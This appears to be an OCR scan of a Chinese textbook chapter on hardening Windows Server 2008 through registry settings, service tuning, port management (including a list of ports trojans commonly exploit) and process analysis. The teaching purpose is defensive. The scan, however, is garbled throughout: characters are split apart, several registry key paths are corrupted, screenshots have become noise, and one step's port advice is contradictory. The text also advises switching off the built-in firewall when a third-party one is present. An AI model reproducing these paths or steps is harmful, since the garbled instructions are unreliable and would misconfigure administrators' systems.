志 , 可 能 会 导致 信息 的 泄漏 ,可 以 通过 修改 注册 表 来 禁止 Guest 访问 事件 日 志 。 

2) 禁止 Guest 访问 应 用 日 志 

在 HKEY_LOCAL_MACIHINE 主键 下 的 子 键 SYSTEM\ CurrentControlSet\ Service\ 
Eventlog\Application 下 添加 键 值 名 为 “RestrictGuestAccess”, 类 型 为 DWORD, 将 值 设 置 
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新 了 

3) 禁止 访问 系统 日 志 

在 HKEY_LOCAL_MACIHINE 主键 下 的 子 键 SYSTEMAN CurrentControlSet\ Service\ 
Eventlog\System 下 添加 键 值 名 为 “RestrictGuestAccess”, 类 型 为 DWORD ,将 值 设置 为 1。 

4) 禁止 访问 安全 日 志 

在 HKEY_LOCAL_MACIHINE 主键 下 的 子 键 SYSTEM\ CurrentControlSet Service\ 
Eventlog\ Security 下 添加 键 值 名 为 “RestrictGuestAccess”, 类 型 为 DWORD, 将 值 设 置 
为 1。 

7. 防止 SYN 洪水 攻击 

在 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \ Services \ Tcpip \ 
Parameters 新 建 DWORD 值 ,名 为 “SynAttackProtect” ,将 值 设 置 为 2。 

8. 防止 ICMP 重 定向 报 文 的 攻击 

在 HKEY_LOCAL_MACHINEASYSTEMA CurrentControlSet \ Services\ Tcpip\ 
Parameters3 下 ,新 建 DWORD 值 ,名 为 “EnableICMPRedirects” ,将 值 设 置 为 0。 

9. 不 支持 IGMP 

在 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services \ Tcpip \ 
Parameters 下 ,新 建 DWORD 值 , 名 为 "IGMPLevel”, 将 值 设置 为 0。 

10. 更 改 默认 的 3389 远程 端口 

3389 端口 是 Windows Server 2008 远程 桌面 的 服务 端口 ,可 以 通过 这 个 端口 ,用 “远程 
桌面 "等 连接 工具 来 连接 到 远程 的 服务 器 。 如 果 连 接 上 了 ,输入 系统 管理 员 的 用 户 名 和 密码 
后 ,将 变 得 像 操 作 本 机 一 样 可 以 操作 远程 的 计算 机 ,因此 远程 服务 器 一 般 都 将 这 个 端口 
关闭 。 

若 要 修改 数值 ,需要 修改 注册 表 的 两 个 地 方 。 

(1) 打开 HKEY _LOCAL_MACHINE\SYSTEM\ CurrentControlSet \ Control \ 
TerminalServer\Wds\rdpwd\Tds\tep 修改 PortNumber 的 值 ,默认 是 3389 ,修改 为 自 定义 
的 端口 ,如 5555 。 

(2) 打开 HKEY _ LOCAL_MACHINE\SYSTEM \ CurrentControlSet \ Control \ 
Terminal Server\WinStations\RDP-Tcp 修改 PortNumber 的 值 ,默认 是 3389 ,修改 为 自 定 
义 的 端口 ,但 必须 是 5555 ,因为 这 两 处 的 修改 端口 都 必须 一 致 才 行 。 

修改 完成 后 ,重启 系统 即 可 。 
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本 章 学 习 要 求 : 

。 了 解 进 程 的 概念 。 

。 了解 注册 表 的 概念 。 

。 了解 注册 表 的 结构 。 

。 掌握 服务 的 优化 方法 。 

。 掌握 黑客 经 常 攻击 的 端口 以 及 防范 方法 。 
。 掌握 关闭 端口 的 方法 。 

。 熟悉 端口 查看 命令 及 工具 。 

。 掌握 系统 必要 进程 和 非 必 要 进程 。 

。 熟悉 进程 查看 命令 及 工具 。 

。 熟悉 注册 表 备 份 、 还 原 及 修改 的 方法 。 

。 熟悉 基于 进程 和 注册 表 的 木马 查 杀 方法 。 


11.1 Windows Server 2008 服务 解析 


11.1.1 服务 的 概念 


Windows Server 2008 中 有 很 多 服务 ,主要 有 服务 应 用 程序 、 服 务 控 制程 序 和 服务 控制 
管理 器 。 其 中 ,服务 控制 管理 器 用 来 维护 注册 表 中 的 数据 ,服务 控制 程序 则 是 控制 服务 应 用 
程序 的 模块 ,是 控制 服务 程序 同 服务 管理 器 之 间 的 纽带 。 服 务 应 用 程序 是 服务 程序 的 主体 
程序 ,是 一 个 或 多 个 的 可 执行 代码 。 每 个 服务 有 三 种 方式 ,它们 分 别 是 自动 .手动 和 已 禁用 。 
这 些 服务 程序 很 多 是 相互 依存 的 ,所 以 不 能 随便 停止 某 项 服务 ,否则 很 可 能 使 系统 出 现 异 常 
情况 。 但 是 有 些 服务 的 确 对 用 户 没什么 作用 ,而 且 还 占据 着 系统 资源 ,这 些 服务 是 完全 可 以 
关闭 的 ,从 而 达到 节省 系统 资源 的 目的 。 


11.1.2 服务 的 优化 


Windows Server 2008 服务 的 优化 主要 有 两 个 方面 ,改变 服务 的 启动 顺序 和 禁用 不 必 
要 的 服务 。 

1. 改变 服务 的 启动 顺序 

Windows Server 2008 服务 的 启动 顺序 可 以 通过 注册 表 来 实现 ,打开 HKEY_LOCAL_ 
MACHINE\SYSTEM\CurrentControlSet\ Services\, 下 面 介绍 两 个 与 启动 服务 顺序 相关 
的 键 值 。 

(1) Group 值 : 一 个 REG_SZ 类 型 的 值 ,用 来 描述 服务 属于 哪 一 个 服务 组 ,如果 没有 这 
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一 项 ,那么 它 就 不 属于 任何 一 个 服务 组 ,系统 默认 其 在 启动 其 他 所 有 的 服务 后 再 加 载 。 

(2) Tag 值 : 一 个 REG_DWORD 类 型 的 值 。 用 来 描述 服务 的 标识 。 在 服务 组 里 每 一 
个 服务 都 有 一 个 标识 ,注册 表 通 过 服务 组 来 安排 同 组 中 各 服务 的 先后 加 载 顺序 。 

改变 服务 的 启动 顺序 分 为 两 个 步骤 : 改变 服务 组 的 启动 顺序 和 改变 服务 组 中 各 服务 的 
启动 顺序 。 下 来 分 别 介 绍 一 下 操作 过 程 。 

打开 注册 表 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\ 
Services GroupOrder 键 的 List 值 , 这 里 保存 了 表示 服务 组 启动 顺序 的 信息 ,每 一 个 服务 组 
都 是 一 个 字符 串 , 要 想 改变 它们 的 启动 顺序 ,只 要 改变 它们 的 位 置 就 可 以 了 ,如 图 11-1 
所 示 。 

打开 注册 表 HKEY_LOCAL_MACHINE\SYSTEMA CurrentControlSet\ Control\ 
GroupOrderList 键 下 有 各 服务 组 中 各 服务 的 启动 顺序 的 信息 ,每 个 服务 组 的 信息 都 被 保存 
为 一 个 REG_BINARY 类 型 的 值 , 如 FSFilter System 服务 组 ,要 想 改变 它们 的 加 载 顺 序 ,只 
需 编辑 这 个 二 进 制 字符 串 即 可 ,如 图 11-2 所 示 。 


| 编辑 二 进 制 数值 | 


Cae |] ws | 


图 11-1 改变 服务 组 界面 图 11-2 改变 组 内 加 载 顺 序 


2. 禁用 不 必要 的 服务 


在 启动 Windows 系统 时 ,总 会 有 大 量 的 程序 和 服务 被 调 入 系统 内 存 中 ,是 用 来 控制 
Windows 系统 的 硬件 设备 、 内 存 、 文 件 管理 或 者 是 其 他 重要 的 系统 功能 的 ,但 是 在 这 些 启动 
的 服务 中 ,有 一 部 分 是 用 户 不 需要 的 ,所 以 要 关 掉 这 些 服务 ,提高 系统 或 服务 器 的 性 能 。 

作为 一 个 网 络 管理 员 ,备份 能 减少 大 量 的 工作 量 , 所 以 在 禁用 某 个 服务 之 前 ,要 提前 做 
好 备份 (注册 表 的 备份 将 在 11. 4. 3 节 介绍 ) ,如 果 对 某 个 服务 的 功能 不 了 解 或 者 不 是 很 明 
确 ,在 关闭 服务 时 ,不 要 一 次 关 掉 多 项 服务 ,应 该 首先 关 掉 一 个 ,运行 一 段 时 间 ,如果 没 出 现 
异常 情况 ,再 接着 关闭 其 他 的 服务 。 

在 介绍 系统 不 必要 的 服务 之 前 ,首先 介绍 如 何 查看 服务 的 依存 服务 (至 于 服务 的 禁用 、 
启动 和 重新 启动 ,在 第 10 章 已 做 介绍 .这 里 不 再 重复 ) ,具体 操作 是 : 首先 打开 “服务 ”窗口 ， 
选中 想 要 修改 的 服务 ,右键 单 击 , 选 择 “ 属 性 ”命令 ,在 弹出 的 对 话 框 中 选择 “依存 关系 ”选项 
卡 ,这 里 以 COM 十 Event System 为 例 ,如 图 11-3 所 示 。 至 于 其 他 选项 卡 “ 常 规 “ 登 录 ” 和 
“恢复 ”在 这 里 不 做 介绍 。 

下 面 来 介绍 几 个 可 以 关闭 的 服务 。 

(1) 检查 不 用 的 硬件 。 检 查 是 否 存 在 一 些 硬 件 从 来 没有 被 使 用 过 。 比 如 说 ,如 果 不 使 
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com+ Event Systen 的 民 性 (本地 计算 机 | 
常规 | 登录 | 恢复 。 依存 关系 
一 由 、 。 如 果 系 统 


® Sy Backer ound Intelli gent Transfer Service 
加 hy CD System Application 

田 全 y SL UT Notification Service 

加 于 System Event Botification Service 


CD | ene 


图 11-3 依存 关系 界面 


用 系统 收发 传真 ,就 可 以 将 Fax Service 设 为 手动 或 者 禁用 ; 不 使 用 CD 刻录 功能 ,可 以 将 
IMAPI CD-Burning COM Service 设 定 为 手动 或 者 禁用 。 

(2) 关闭 Windows 主题 ”。 如 果 对 Windows 的 主题 不 感 兴趣 或 者 是 计算 机 的 配置 比 
较 低 ,可 以 通过 禁用 Themes 服务 来 节省 内 存 资 源 。 在 禁用 之 前 首先 将 桌面 设置 为 
“Windows 经 典 样式 ”。 

(3) 关闭 警报 服务 。Windows 允许 用 户 在 计算 机 之 间 发 送 管理 和 通知 的 服务 ,从 现在 
的 应 用 来 看 ,这 项 服务 对 大 多 数 用 户 并 没有 多 大 作用 ,可 以 关闭 此 服务 。 

(4) 关闭 防火 墙 。 如 果 用 户 安装 了 第 三 方 防火 墙 , 则 Windows 自 带 的 防火 墙 就 起 不 了 
太 大 的 作用 ,首先 关闭 防火 墙 , 然 后 禁用 Windows Firewall/Internet Connection Sharing。 

(5) 禁用 远程 注册 。 远 程 注册 的 主要 作用 就 是 对 其 他 用 户 远程 控制 注册 表 提 供 支 持 。 
这 项 服务 对 大 多 用 户 来 说 并 不 需要 ,通过 禁用 Remote Registry 关闭 此 服务 。 

(6) 禁用 Windows 帮助 。 如 果 很 少 使 用 系统 帮助 ,可 以 通过 禁用 Help and Support 来 
达到 目的 ,但 是 用 户 再 次 使 用 系统 帮助 后 ,Windows 依然 会 提供 “帮助 ”服务 ,并 将 启动 类 型 
自动 设置 为 “自动 ”状态 。 

上 面 这 几 项 是 针对 大 多 数 用 户 而 言 的 ,但 是 关闭 不 使 用 的 服务 ,最 主要 的 是 根据 自己 的 
系统 或 服务 器 来 进行 设置 ,这 里 只 介绍 其 中 简单 的 几 个 。 


11.2 Windows Server 2008 端口 解析 


11.2.1 端口 的 概念 


Windows 中 的 端口 是 指 TCP/IP 中 的 端口 ,范围 是 0 一 65535 。 

在 Internet 上 ,各 主机 间 通 过 TCP/IP 发 送 和 接收 数据 包 , 各 个 数据 包 根 据 其 目的 主机 
的 IP 地 址 来 进行 互联 网 络 中 的 路 由 选择 ,通过 端口 将 数据 包 发 送 给 进程 。 本 地 操作 系统 会 
给 有 需求 的 进程 分 配 协议 端口 ,每 个 协议 端口 由 一 个 正 整数 标识 ,如 : 80、139、445 等 。 当 
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目的 主机 接收 到 数据 包 后 ,将 根据 报 文 首部 的 目的 端口 号 ,把 数据 发 送 到 相应 端口 ,而 与 此 
端口 相对 应 的 那个 进程 将 会 接收 数据 并 等 待 下 一 组 数据 的 到 来 。 

端口 可 以 认为 是 一 个 队列 ,操作 系统 为 各 个 进程 分 配 了 不 同 的 队列 ,数据 包 按照 目的 端 
口 被 列 和 人 相应 的 队列 中 ,等待 被 进程 调用 。 在 特殊 的 情况 下 ,这 个 队列 有 可 能 溢出 ,不 过 操 
作 系统 允许 每 个 进程 指定 和 调整 自己 队列 的 大 小 。 不 是 只 有 接收 数据 包 的 进程 需要 开局 它 
自己 的 端口 ,发送 数据 包 的 进程 也 需要 开启 端口 ,这样 ,数据 包 中 将 会 标识 出 源 端口 ,以 便 接 
收 方 能 顺利 地 回 传 数据 包 到 这 个 端口 。 


11.2.2 端口 的 分 类 


端口 分 类 有 以 下 两 种 方法 。 

1. 按 端口 号 分 类 

(1) 公认 端口 (熟知 端口 ): 0 一 1023。 它 们 专门 为 一 些 应 用 程序 提供 服务 。 通 常 这 些 
端口 的 通信 明确 表明 了 某 种 服务 的 协议 ,例如 : 80 端口 实际 上 总 是 HTTP 通信 。 

(2) 注册 端口 : 1024 一 49 151。 它 们 随机 地 为 应 用 程序 提供 服务 ,许多 服务 绑 定 于 这 些 
端口 ,这 些 端口 同样 可 以 用 于 其 他 目的 。 例 如 : 许多 系统 处 理 动态 端口 从 1024 左右 开始 。 

(3) 动态 和 /或 私有 端口 : 49 152 一 65 535。 从 理论 上 来 讲 , 不 需要 为 服务 分 配 这 些 端 
口 ,实际 上 ,机 器 通常 从 1024 起 分 配 动 态 端口 。 但 也 有 例外 : Sun 的 RPC 端口 从 32 768 
开始 。 

2. 按 对 应 的 协议 类 型 端口 分 类 

TCP 端口 和 UDP 端口 。 由 于 TCP 和 UDP 两 个 协议 是 独立 的 ,因此 各 自 的 端口 号 也 
相互 独立 ,比如 TCP 有 110 端口 ,UDP 也 可 以 有 110 端口 ,两 者 并 不 冲突 。 


11.2.3 常 被 黑客 利用 的 端口 


一 些 端口 常常 会 被 黑客 利用 ,还 会 被 一 些 木马 病毒 利用 ,对 计算 机 系统 进行 攻击 ,以 下 
是 计算 机 端口 的 介绍 以 及 防止 被 黑客 攻击 的 简要 办 法 。 

1. 端口 : 8080。 

服务 : WWW 代理 服务 

说 明 : 8080 端口 同 80 端口 ,可 以 被 各 种 病毒 程序 所 利用 ,比如 Brown Orifice(BrO) 特 
洛 伊 木马 病毒 可 以 利用 8080 端口 完全 遥控 被 感染 的 计算 机 。 另 外 , RemoConChubo、 
RingZero 木马 也 可 以 利用 该 端口 进行 攻击 。 一 般 人 们 是 使 用 80 端口 进行 网 页 浏览 的 ,为 
了 避免 病毒 的 攻击 ,可 以 关闭 该 端口 。 

2. 端口 : 21 

服务 : FTP。 

说 明 : FTP 服务 器 所 开放 的 端口 ,用 于 上 传 和 下 载 。 最 常见 的 攻击 者 用 这 个 端口 寻找 
打开 anonymous 的 FTP 服务 器 的 方法 。 这 些 服 务 器 带 有 可 读 写 的 目录 。 木 马 Doly 
Trojan、Fore Invisible FTP、WebEx、WinCrash 和 Blade Runner 利用 这 个 开放 的 端口 进行 
攻击 。 
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3. 端口 : 22 

服务 : SSH。 

说 明 : PcAnywhere 建立 的 TCP 和 这 一 端口 的 连接 是 为 了 寻找 SSH。 这 一 服务 有 许 
多 弱点 ,如 果 配 置 成 特定 的 模式 ,许多 使 用 RSAREF 库 的 版 本 就 会 有 不 少 的 漏洞 存在 。 

4. 端口 : 23 

服务 : Telnet。 

说 明 : 远程 登录 ,入 侵 者 可 以 搜索 远程 登录 UNIX 的 服务 。 大 多 数 情 况 下 扫描 这 一 端 
口 是 为 了 找到 机 器 运行 的 操作 系统 。 如 果 使 用 其 他 攻击 技术 ,入 侵 者 还 会 找到 密码 等 敏感 
信息 。 木 马 Tiny Telnet Server 就 使 用 这 个 端口 。 

5. 端口 : 25 

服务 : SMTP。 

说 明 : SMTP 服务 器 所 开放 的 端口 ,用 于 发 送 邮件 。 入 侵 者 寻找 SMTP 服务 器 是 为 了 
传递 他 们 的 SPAM。 入 侵 者 的 账户 被 关闭 ,他 们 需要 连接 到 高 带宽 的 E-Mail 服务 器 上 ,将 
简单 的 信息 传递 到 不 同 的 地 址 。 木 马 Antigen、Email Password Sender、 Haebu Coceda、 
Shtrilitz Stealth、WinPC、WinSpy 都 开放 这 个 端口 。 

6. 端口 : 80 

服务 : HTTP。 

说 明 : 用 于 网 页 浏览 。 木 马 Executor 开放 此 端口 。 

7. 端口 : 102 

服务 : Message Transfer Agent(MTA)-X. 400 over TCP/IP。 

说 明 : 消息 传输 代理 。 

8. 端口 : 110 

服务 : Post Office Protocol -Version3 。 

说 明 : POP3 服务 器 开放 此 端口 ,用 于 接收 邮件 ,客户 端 访 问 服务 器 端的 邮件 服务 。 
POP3 服务 有 许多 公认 的 弱点 。 关 于 用 户 名 和 密码 交换 缓冲 区 溢出 的 弱点 至 少 有 20 个 ,这 
意味 着 入 侵 者 可 以 在 真正 登录 前 进入 系统 。 成 功 登 录 后 还 有 其 他 缓冲 区 溢出 错误 。 

9. 端口 : 111 

服务 : Sun 公司 的 RPC 服务 中 所 包含 的 各 种 服务 的 端口 。 

说 明 : 常见 RPC 服务 有 rpc. mountd、NFS、rpe. statd rpc. csmd、rpc. ttybd、amd 等 。 

10. 端口 : 119 

服务 : Network News Transfer Protocol。 

说 明 : NEWS 新 闻 组 传输 协议 ,承载 USENET 通信 。 这 个 端口 的 连接 通常 是 人 们 在 
寻找 USENET 服务 器 。 多 数 ISP 限制 该 服务 ,只 有 他 们 的 客户 才能 访问 他 们 的 新 闻 组 服 
务 器 。 打 开 新 闻 组 服务 器 将 允许 发 / 读 任何 人 的 帖子 ,访问 被 限制 的 新 闻 组 服务 器 ,匿名 发 
帖 或 发 送 SPAM 。 

11. 端口 : 135 


服务 : Location Service。 
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说 明 : Microsoft 在 这 个 端口 运行 DCE RPC end-point mapper 为 它 的 DCOM 服务 。 
这 与 UNIX 111 端口 的 功能 很 相似 。 使 用 DCOM 和 RPC 的 服务 利用 计算 机 上 的 end-point 
mapper 注册 它们 的 位 置 。 远 端 客 户 连接 到 计算 机 时 ,它们 查找 end-point mapper 服务 的 位 
置 。 黑 客 扫描 计算 机 的 这 个 端口 是 为 了 找到 这 个 计算 机 上 运行 的 Exchange Server。 

12. 端口 : 137、138、139 

服务 : NetBIOS Name Service。 

说 明 : 其 中 137、138 是 UDP 端口 , 当 通 过 网 上 邻居 传输 文件 时 用 这 个 端口 。 而 通过 
139 端口 进入 的 连接 试图 获得 NetBIOS/SMB 服务 。 这 个 协议 被 用 于 Windows 文件 .打印 
机 共享 和 SAMBA。 另 外 也 用 于 WINS Regisrtation。 

13. 端口 : 161 

服务 : SNMP。 

说 明 : SNMP 允许 远程 管理 设备 。 所 有 配置 和 运行 的 信息 都 储存 在 数据 库 中 ,通过 
SNMP 可 获得 这 些 信息 。 许 多 管理 员 的 错误 配置 将 被 暴露 在 Internet。 黑 客 将 会 尝试 使 用 
默认 的 密码 public、private 访问 系统 。 他 们 可 能 会 尝试 所 有 可 能 的 组 合 。SNMP 包 可 能 会 
被 错误 地 指向 用 户 的 网 络 。 

14. 端口 : 177 

服务 : X Display Manager Control Protocol。 

说 明 : 许多 入 侵 者 通过 它 访问 X-windows 操作 台 , 它 同时 需要 打开 6000 端口 。 

15. 端口 : 389 

服务 : LDAP ILS。 

说 明 : 轻型 目录 访问 协议 和 NetMeeting Internet Locator Server 共用 这 一 端口 。 


11.2.4 端口 的 安全 管理 


一 般 来 说 ,查看 端口 的 方法 有 两 种 : 一 种 是 利用 系统 内 置 的 命令 ,一 种 是 利用 端口 相关 
工具 。 下 面 简单 介绍 几 个 命令 方法 或 工具 。 

1. 端口 重 定向 

一 种 常见 的 技术 是 把 一 个 端口 重 定 向 到 另 一 个 端口 。 实 现 重 定向 是 为 了 隐藏 公认 的 默 
认 端 口 ,降低 受 破坏 率 。 假 如 有 人 要 对 一 个 公认 的 默认 端口 进行 攻击 则 必须 先进 行 端口 扫 
描 。 在 UNIX 系统 上 ,如 果 要 侦 听 1024 以 下 的 端口 需要 有 root 权限 。 如 果 没 有 root 权限 
而 又 想 打 开 Web 服务 ,就 需要 将 其 安装 在 较 高 的 端口 。 此 外 ,一 些 ISP 的 防火 墙 能 够 拦截 
低 端口 的 通信 ,这 样 即使 拥有 整个 机 器 还 是 得 重 定向 端口 。 

2. netstat -an 

使 用 该 命令 是 查看 自己 所 开放 端口 的 最 方便 的 方法 ,可 以 在 cmd 中 输入 这 个 命令 。 使 
用 该 命令 后 结果 如 下 所 示 。 

C:\Documents and Settings\Administrator > netstat —an 


Active Connections 
Proto Local Address Foreign Address State 
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TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:6195 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:1032 0.0.0.0:0 LISTENING 
TCP 219.246.5.206:139 0.0.0.0:0 LISTENING 
TCP 219.246.5.206:445 219.246.5.94:7101 ESTABLISHED 
TCP 219.246.5.206:445 219.246.5.237:4685 ESTABLISHED 
UDP 0.0.0.0:161 类: 关 

UDP 0.0.0.0:445 类: 关 


3. Visual Sniffer 


这 个 工具 可 以 拦截 网 络 数 据 包 ,查看 正在 开放 的 各 个 端口 。 该 工具 界面 如 图 11-4 
所 示 。 


Visual Sniffer 


后 | 测 & 择 网 RI8 址 [Es 2 和 S35] 安 停 上 关 雪 | + | H 9 印 冒进 出 


是 再 主机 地 让 本 
日 电 114.244.65. 4 
3 
U 114.244.6:5 
日 时 119.108.124.170 


由 - 浙 2042 
日 暑 119.114.121.240 
Ee 
W2427 
日 时 120.87 202 247 
S41971 
U 120.67.20 
123.116. 255.25 
123.117.222. 111 
123. 129.242. 131 
123.14.163.214 
123.6.99.233 | 
» 


正在 装载 :123,117.222,111_16103-219.246.5.206_15000-17 


图 11-4 ”Visual Sniffer 界面 


4. FPort 

FPort 可 以 把 本 机 开放 的 TCP/UDP 端口 同 应 用 程序 关联 起 来 ,和 使 用 “netstat -an” 命 
令 产生 的 效果 类 似 , 但 是 该 软件 还 可 以 把 端口 和 运行 着 的 进程 关联 起 来 ,并 可 以 显示 进程 
PID、 名 称 和 路 径 。 该 软件 可 以 将 未 知 的 端口 同 应 用 程序 关联 起 来 。 


结果 如 下 所 示 。 

Pid Process Port Proto Path 

772 -> 135 ‘TP 

4 System -> 139 TCP 

4 System -> 445 TCP 

816 -> 1032 TCP 

464 360SE -> 1430 TCP C:\Program Files\360\360se\360SE. exe 
464 360SE —> 1869 TCP C:\Program Files\360\360se\360SE. exe 
840 svchost -> 6195 TCP C:\WINDOWS\System32\svchost. exe 

31 -> 123 UDP 

1668 snmpd -> 123 UDP d:\usr\bin\snmpd. exe 


1668 snmpd -> 137 UDP d:\usr\bin\snmpd. exe 
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2040 QQ -> 138 UDP C:\Program FilesN\Tencent\QQ\BinN\00. exe 
772 -> 161 UDP 

4 System -> 445 UDP 

840 svchost -> 500 UDP C:\WINDOWS\System32\svchost. exe 

4 System -> 1025 ”UDP 

952 -> 1026 UDP 


5. ActivePort. exe 

这 个 工具 是 一 个 用 来 查看 本 地 主机 开放 端口 的 工具 ,除了 具有 上 面 两 个 程序 的 全 部 功 
能 外 ,还 有 两 个 更 大 的 优点 : 图 形 界面 和 关闭 端口 。 

6. SuperScan 3.0 

这 个 工具 是 一 个 端口 扫描 类 软件 ,扫描 速度 快 而 且 可 以 指定 扫描 的 端口 。 


11.3 Windows Server 2008 进程 解析 


11.3.1 进程 的 概念 


进程 是 程序 在 计算 机 上 的 一 次 执行 活动 。 当 运行 一 个 程序 时 ,就 启动 了 一 个 进程 。 显 
然 ,程序 是 静态 的 ,进程 是 动态 的 。 进 程 可 以 分 为 系统 进程 和 用 户 进程 。 几 是 用 于 完成 操作 
系统 的 各 种 功能 的 进程 就 是 系统 进程 ,它们 就 是 处 于 运行 状态 下 的 操作 系统 本 身 ; 用 户 进 
程 就 是 所 有 由 用 户 启 动 的 进程 。 进 程 是 操作 系统 进行 资源 分 配 的 单位 。 

进程 是 一 个 具有 独立 功能 的 程序 ,是 关于 某 个 数据 集合 的 一 次 运行 活动 。 它 可 以 申请 
和 拥有 系统 资源 ,是 一 个 动态 的 概念 ,是 一 个 活动 的 实体 。 它 不 只 是 程序 的 代码 ,还 包括 当 
前 的 活动 ,通过 程序 计数 器 的 值 和 处 理 寄存 器 的 内 容 来 表示 。 

进程 是 操作 系统 中 最 基本 、 重 要 的 概念 。 在 多 道 程序 系统 出 现 后 ,为 了 刻画 系统 内 部 出 
现 的 动态 情况 ,描述 系统 内 部 多 道 程序 的 活动 规律 而 引进 的 一 个 概念 ,所 有 多 道 程序 设计 操 
作 系 统 都 建立 在 进程 的 基础 上 。 

进程 是 应 用 程序 的 运行 实例 ,是 应 用 程序 的 一 次 动态 执行 。 可 以 简单 地 理解 为 操作 系 
统 当前 运行 的 执行 程序 。 系 统 当前 运行 的 执行 程序 里 包括 : 系统 管理 计算 机 程序 、 各 种 操 
作 所 必需 的 程序 、 用 户 开启 和 执行 的 额外 程序 ,当然 也 包括 用 户 不 知道 的 程序 和 自动 运行 的 
非法 程序 (它们 可 能 就 是 病毒 程序 )。 和 危害 较 大 的 可 执行 病毒 是 以 “进程 形式 出 现在 系统 内 
部 ,那么 及 时 查看 并 准确 杀 掉 非法 进程 对 于 手工 杀毒 又 起 着 关键 性 的 作用 。 


11.3.2 基本 进程 解析 

下 面 来 介绍 一 下 Windows Server 2008 的 必要 进程 。 打 开 “ 任 务 管理 器 ” ,选择 “进程 ” 
选项 卡 , 就 可 以 看 到 本 机 当前 运行 的 进程 ,如 图 11-5 所 示 。 

下 面 来 介绍 一 下 系统 必要 进程 。 

1. winlogon. exe 


winlogon 是 用 户 登录 程序 ,管理 用 户 登录 和 退出 进程 。 在 用 户 按 下 Ctrl 十 Alt 十 Del 组 
合 键 时 激活 。 该 进程 提供 了 登录 所 需 类 型 控制 和 输入 口令 所 需 的 对 话 框 。 当 用 户 输入 用 户 


第 11 章 Windows Server 2008 的 深层 安全 防护 315 


问 rinaews 任务 管理 器 =l9|x| 
文件 中， 选项 中) 查看 W) 帮助 0 


应 用 程序 进程 | 服务 | 性 能 | 联网 | 用 户 | 


CEV 


1,584 下 客户 油 
2,008 kK 客户 庙 
1,200 X 桌面 窗 . 
12,532 了 Windovs 
2, 964 下 本 地 安 
1,376 X 本 地 会 
2,808 K lS ITCe 
2,028 X 服务 和 . 


6,728 K Microso, 
300 K Windows, 
3,588 X 后 台 处 . 
16, 624 K Vindows, 
3,460 K Windows 
3,616 K Windows,.. 


8888888888888s8 


限 程 数 : 到 ”CFV 使 用 名 | 物理 内 存 : 66% 6 
图 11-5 任务 管理 器 


名 和 口令 时 ,winlogon 将 其 发 送 给 lsass 的 子 进程 。 如 果 执 行 对 服务 器 或 工作 站 的 本 地 登 
录 ,lsass 将 在 安全 数据 库 内 查找 有 关 用 户 名 和 口令 。winlogon 进程 的 正常 路 径 应 是 C:\ 
Windows\System32 且 是 以 SYSTEM 用 户 运 行 , 若 不 是 以 上 路 径 且 不 以 SYSTEM 用户 运 
行 , 则 可 能 是 病毒 。 

2. explorer. exe 

Windows 资源 管理 器 ,可 以 说 是 Windows 图 形 界面 的 外 壳 程 序 , 它 是 一 个 有 用 的 系统 
进程 。 它 的 正常 路 径 是 C:\Windows 目录 。 关 闭 此 进程 ,桌面 上 的 图 标 会 全 部 消失 。 

3. Csrss. exe 

csrss. exe 是 微软 客户 -服务 器 运行 时 的 子 系统 ,必须 一 直 处 于 运行 状态 。 该 进程 管理 
Windows 图 形 相关 任务 。 这 个 进程 对 系统 的 正常 运行 是 非常 重要 的 。 

4. System Idle 

该 进程 作为 单线 程 运行 在 每 个 处 理 器 上 ,并 在 系统 不 处 理 其 他 线程 的 时 候 分 派 处 理 器 
的 时 间 。 在 任务 管理 器 中 , 它 的 CPU 占用 率 越 大 表示 可 供 分 配 的 CPU 资源 越 多 ,占用 率 
越 小 则 表示 CPU 资源 紧张 。 

5. smss. exe 

该 进程 为 会 话 管理 子 系统 初始 化 系统 变量 ,调用 Win32 壳 子 系统 和 运行 在 Windows 
登录 过 程 。smss. exe 是 微软 Windows 操作 系统 的 一 部 分 。 该 进程 调用 对 话 管理 子 系统 和 
负责 操作 系统 的 对 话 。 这 个 进程 对 系统 的 正常 运行 是 非常 重要 的 。 

6. lsass. exe 

lsass. exe 是 一 个 系统 进程 ,用 于 微软 Windows 系统 的 安全 机 制 。 它 用 于 本 地 安全 和 
登录 策略 。 


7. services. exe 


services. exe 是 微软 Windows 操作 系统 的 一 部 分 ,用 于 管理 启动 和 停止 服务 。 该 进程 
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也 会 处 理 在 计算 机 启动 和 关机 时 运行 的 服务 。 这 个 程序 对 系统 的 正常 运行 是 非常 重要 的 。 
终止 进程 后 会 重启 。 正 常 的 services. exe 位 于 %systemroot%\System32 文件 夹 中 ,在 进程 
里 用 户 名 显示 为 “system”。 

8. spoolsv. exe 


spoolsv. exe 用 于 将 Windows 打印 机 任务 发 送 给 本 地 打印 机 。 
11. 3.3 svchost. exe 进程 的 解析 


svchost. exe 是 一 个 属于 微软 Windows 操作 系统 的 系统 程序 ,用 于 执行 DLL 文件 。 这 
个 程序 对 系统 的 正常 运行 是 非常 重要 的 。svchost. exe 是 系统 必 不 可 少 的 一 个 进程 ,很 多 服 
务 都 会 用 到 它 。 

Windows 系统 服务 分 为 独立 进程 和 共享 进程 两 种 ,在 Windows NT 里 面 只 有 服务 器 管 
理 器 SCM(services. exe) 有 多 个 共享 服务 , 随 着 系统 内 置 服务 的 增加 ,在 Windows 2000 中 
又 把 很 多 服务 设置 为 共享 方式 ,由 svchost. exe 启动 。Windows 2000 一 般 有 两 个 svchost 
进程 ,一 个 是 RPCSS(Remote Procedure Call) 服务 进程 ,另外 一 个 则 是 由 很 多 服务 共享 的 
进程 。 而 在 Windows XP 中 , 则 一 般 有 4 个 以 上 的 svchost. exe 服务 进程 , Windows Server 
2003 及 Windows Server 2008 中 则 更 多 。 可 以 看 出 ,把 更 多 的 系统 内 置 服务 以 共享 进程 方 
式 由 svchost 启动 是 操作 系统 发 展 的 一 个 趋势 ,这 样 做 在 一 定 程度 上 减少 了 系统 资源 的 消 
耗 ,不 过 也 带 来 一 定 的 不 稳定 因素 ,因为 任何 一 个 共享 进程 的 服务 因为 错误 退出 进程 就 会 导 
致 整个 进程 中 的 所 有 服务 都 退出 。 下 面 介 绍 一 下 svchost. exe 的 原理 。 

1. svchost 的 原理 

svchost 本 身 只 是 作为 服务 宿主 ,并 不 实现 任何 服务 功能 ,需要 svchost 启动 的 服务 以 
